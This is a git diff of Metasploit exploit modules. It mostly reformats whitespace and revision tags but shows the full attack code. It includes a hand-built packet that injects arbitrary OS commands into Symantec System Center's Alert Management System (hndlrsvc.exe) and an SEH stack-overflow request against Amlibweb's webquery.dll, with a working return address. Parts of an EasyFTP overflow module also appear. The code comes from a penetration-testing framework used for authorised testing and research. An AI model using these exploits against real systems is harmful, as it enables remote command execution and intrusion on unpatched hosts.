diff --git a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb index e568352e3c..65ffef9a7b 100644 --- a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb +++ b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb @@ -1,5 +1,5 @@ ## -# $Id: ams_hndlrsvc.rb 9179 2010-04-30 08:40:19Z mc $ +# $Id$ ## ## @@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution', 'Description' => %q{ Symantec System Center Alert Management System is prone to a remote command-injection vulnerability - because the application fails to properly sanitize user-supplied input. + because the application fails to properly sanitize user-supplied input. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66807'], @@ -35,101 +35,102 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 26 2010')) - register_options( - [ - Opt::RPORT(38292), - OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']), - ], self.class) + register_options( + [ + Opt::RPORT(38292), + OptString.new('CMD', [ false, 'The OS command to execute', + 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']), + ], self.class) end def run begin connect - cmd = datastore['CMD'] - - if ( cmd.length > 128 ) - raise RuntimeError,"Command strings greater then 128 characters will not be processed!" - end + cmd = datastore['CMD'] - string_uno = Rex::Text.rand_text_alpha_upper(11) - string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5) + if ( cmd.length > 128 ) + raise RuntimeError,"Command strings greater then 128 characters will not be processed!" + end - packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" - packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" - packet << "\xe8\x03\x00\x00" - packet << 'PRGXCNFG' - packet << "\x10\x00\x00\x00" - packet << "\x00\x00\x00\x00\x04" - packet << 'ALHD\F' - packet << "\x00\x00\x01\x00\x00" - packet << "\x00\x01\x00\x0e\x00" - packet << 'Risk Repaired' - packet << "\x00\x25\x00" - packet << 'Symantec Antivirus Corporate Edition' - packet << "\x00\xf9\x1d\x13\x4a\x3f" - packet << [string_uno.length + 1].pack('v') + string_uno - packet << "\x00\x08\x08\x0a" - packet << "\x00" + 'Risk Name' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x0a\x00" - packet << 'File Path' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x11\x00" - packet << 'Requested Action' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x0e\x00" - packet << 'Actual Action' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x07\x00" - packet << 'Logger' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x05\x00" - packet << 'User' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x09\x00" - packet << 'Hostname' - packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno - packet << "\x00\x08\x13\x00" - packet << 'Corrective Actions' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x00\x07\x08\x12\x00" - packet << 'ConfigurationName' - packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') - packet << "\x00" + cmd - packet << "\x00\x08\x0c\x00" - packet << 'CommandLine' - packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') - packet << "\x00" + cmd - packet << "\x00\x08\x08\x00" - packet << 'RunArgs' - packet << "\x00\x04\x00\x02\x00" - packet << "\x20\x00\x03\x05\x00" - packet << 'Mode' - packet << "\x00\x04\x00\x02\x00\x00\x00" - packet << "\x0a\x0d\x00" - packet << 'FormatString' - packet << "\x00\x02\x00\x00\x00\x08\x12\x00" - packet << 'ConfigurationName' - packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" - packet << 'HandlerHost' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00" * packet.length - - print_status("Sending command: #{datastore['CMD']}") - sock.put(packet) - - disconnect + string_uno = Rex::Text.rand_text_alpha_upper(11) + string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5) + + packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" + packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" + packet << "\xe8\x03\x00\x00" + packet << 'PRGXCNFG' + packet << "\x10\x00\x00\x00" + packet << "\x00\x00\x00\x00\x04" + packet << 'ALHD\F' + packet << "\x00\x00\x01\x00\x00" + packet << "\x00\x01\x00\x0e\x00" + packet << 'Risk Repaired' + packet << "\x00\x25\x00" + packet << 'Symantec Antivirus Corporate Edition' + packet << "\x00\xf9\x1d\x13\x4a\x3f" + packet << [string_uno.length + 1].pack('v') + string_uno + packet << "\x00\x08\x08\x0a" + packet << "\x00" + 'Risk Name' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x0a\x00" + packet << 'File Path' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x11\x00" + packet << 'Requested Action' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x0e\x00" + packet << 'Actual Action' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x07\x00" + packet << 'Logger' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x05\x00" + packet << 'User' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x09\x00" + packet << 'Hostname' + packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno + packet << "\x00\x08\x13\x00" + packet << 'Corrective Actions' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x00\x07\x08\x12\x00" + packet << 'ConfigurationName' + packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') + packet << "\x00" + cmd + packet << "\x00\x08\x0c\x00" + packet << 'CommandLine' + packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') + packet << "\x00" + cmd + packet << "\x00\x08\x08\x00" + packet << 'RunArgs' + packet << "\x00\x04\x00\x02\x00" + packet << "\x20\x00\x03\x05\x00" + packet << 'Mode' + packet << "\x00\x04\x00\x02\x00\x00\x00" + packet << "\x0a\x0d\x00" + packet << 'FormatString' + packet << "\x00\x02\x00\x00\x00\x08\x12\x00" + packet << 'ConfigurationName' + packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" + packet << 'HandlerHost' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00" * packet.length + + print_status("Sending command: #{datastore['CMD']}") + sock.put(packet) + + disconnect rescue ::Exception - print_error("Error: #{$!.class} #{$!}") + print_error("Error: #{$!.class} #{$!}") end end end diff --git a/modules/auxiliary/admin/symantec/ams_xfr.rb b/modules/auxiliary/admin/symantec/ams_xfr.rb index 736e82cf1f..810b265cc6 100644 --- a/modules/auxiliary/admin/symantec/ams_xfr.rb +++ b/modules/auxiliary/admin/symantec/ams_xfr.rb @@ -1,5 +1,5 @@ ## -# $Id: ams_xfr.rb 9179 2010-04-30 08:40:19Z jduck $ +# $Id$ ## ## @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9179 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1429' ], diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 9476bd2963..3f1594e55e 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. credit goes to Karn Ganeshan. - NOTE: Although, this is likely to exploit the same vulnerability as the + NOTE: Although, this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector. }, 'Author' => @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote if (banner =~ /BigFoolCat/) return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index c98d6283b9..ac129accf5 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -20,30 +20,30 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow', - 'Description' => %q{ - This module exploits a stack overflow in Amlib's Amlibweb - Library Management System (NetOpacs). The webquery.dll - API is available through IIS requests. By specifying - an overly long string to the 'app' parameter, SeH can be - reliably overwritten allowing for arbitrary remote code execution. - In addition, it is possible to overwrite EIP by specifying - an arbitrary parameter name with an '=' terminator. + 'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Amlib's Amlibweb + Library Management System (NetOpacs). The webquery.dll + API is available through IIS requests. By specifying + an overly long string to the 'app' parameter, SeH can be + reliably overwritten allowing for arbitrary remote code execution. + In addition, it is possible to overwrite EIP by specifying + an arbitrary parameter name with an '=' terminator. }, - 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '66814'], - [ 'URL', 'http://www.aushack.com/advisories/' ], - ], + 'Author' => [ 'patrick' ], + 'Arch' => [ ARCH_X86 ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '66814'], + [ 'URL', 'http://www.aushack.com/advisories/' ], + ], 'Privileged' => true, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => { 'Space' => 600, @@ -54,15 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # patrickw - Tested OK 20100803 w2k IIS5 - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 - # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. - ], + [ + # patrickw - Tested OK 20100803 w2k IIS5 + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 + # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. + ], 'DisclosureDate' => 'Aug 03 2010', #0day 'DefaultTarget' => 0)) - register_options( + register_options( [ Opt::RPORT(80), ],self.class) @@ -70,9 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - + rand = Rex::Text.rand_text_alpha(10) - + sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n") res = sock.get(-1,3) disconnect @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit connect seh = generate_seh_payload(target.ret) - buffer = Rex::Text.rand_text_alphanumeric(3028) + seh + buffer = Rex::Text.rand_text_alphanumeric(3028) + seh sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n" sock.put(sploit + "\r\n\r\n")